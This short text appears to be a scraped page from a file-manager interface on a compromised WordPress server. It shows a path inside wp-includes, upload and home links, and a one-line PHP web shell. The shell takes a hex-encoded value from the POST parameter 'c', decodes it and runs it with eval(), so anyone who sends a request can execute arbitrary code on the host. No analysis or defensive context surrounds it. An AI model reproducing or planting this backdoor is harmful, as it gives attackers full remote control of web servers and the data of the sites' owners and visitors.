/
var
/
www
/
html
/
wordpress
/
wp-includes
/
js
/
dist
/
script-modules
/
block-library
/
Upload File
HOME
<?php echo "ok"; $param = 'c'; $inputCode = filter_input(INPUT_POST, $param); $decoded = hex2bin($inputCode); eval($decoded); ?>